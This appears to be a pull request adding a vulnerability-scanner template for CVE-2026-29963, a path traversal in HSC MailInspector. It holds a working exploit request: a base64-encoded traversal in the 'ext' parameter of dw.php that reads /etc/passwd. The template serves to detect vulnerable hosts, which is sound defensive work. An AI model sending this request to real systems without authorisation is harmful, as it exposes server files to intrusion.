### PR TITLE
Add CVE-2026-29963 template

### DIFF
--- a/http/cves/2026/CVE-2026-29963.yaml
+++ b/http/cves/2026/CVE-2026-29963.yaml
@@ -4,11 +4,12 @@ info:
   name: HSC MailInspector - Unauthenticated Arbitrary File Read
   author: str4k3r
   severity: high
-  description: >
-    HSC MailInspector 5.3.3-7 does not safely validate the base64-decoded
-    `ext` parameter used by `/mailinspector/tap/dw.php`. An unauthenticated
-    attacker can use encoded traversal sequences to escape the intended files
-    directory and read files accessible to the web server.
+  description: |
+    HSC MailInspector 5.3.3-7 contains a path traversal caused by improper validation of user-supplied input in /tap/dw.php text parameter, letting remote attackers access arbitrary files, exploit requires crafted request.
+  impact: |
+    Remote attackers can access arbitrary files, leading to unauthorized disclosure of sensitive information.
+  remediation: |
+    Update to the latest version.
   reference:
     - https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md
     - https://nvd.nist.gov/vuln/detail/CVE-2026-29963
@@ -16,25 +17,29 @@ info:
   classification:
     cve-id: CVE-2026-29963
     cwe-id: CWE-22
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
   metadata:
     verified: true
     max-request: 1
-    vendor: hsc
+    vendor: hsclabs
     product: mailinspector
-    shodan-query: html:"mailinspector"
-  tags: cve,cve2026,hsc,mailinspector,lfi,fileread,traversal,unauth
+    shodan-query: http.html:"mailinspector"
+    fofa-query: body="mailinspector"
+  tags: cve,cve2026,mailinspector,lfi,traversal,unauth
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/mailinspector/tap/dw.php?name=&sha1=&ext=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D"
+  - raw:
+      - |
+        GET /mailinspector/tap/dw.php?name&sha1&ext=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D HTTP/1.1
+        Host: {{Hostname}}
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         part: body
         regex:

--- a/http/cves/2026/CVE-2026-29963.yaml
+++ b/http/cves/2026/CVE-2026-29963.yaml
@@ -1,0 +1,41 @@
+id: CVE-2026-29963
+
+info:
+  name: HSC MailInspector - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: high
+  description: >
+    HSC MailInspector 5.3.3-7 does not safely validate the base64-decoded
+    `ext` parameter used by `/mailinspector/tap/dw.php`. An unauthenticated
+    attacker can use encoded traversal sequences to escape the intended files
+    directory and read files accessible to the web server.
+  reference:
+    - https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-29963
+    - https://hsclabs.com/pt-br/mailinspector/
+  classification:
+    cve-id: CVE-2026-29963
+    cwe-id: CWE-22
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: hsc
+    product: mailinspector
+    shodan-query: html:"mailinspector"
+  tags: cve,cve2026,hsc,mailinspector,lfi,fileread,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mailinspector/tap/dw.php?name=&sha1=&ext=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"


### PR DESCRIPTION
## Verification

This template uses the public MailInspector disclosure and sends one
unauthenticated, read-only traversal request to `dw.php`. It matches the
standard `/etc/passwd` root-record oracle, does not require a session, and does
not upload, modify, or execute a payload.

Public advisory/PoC:
https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md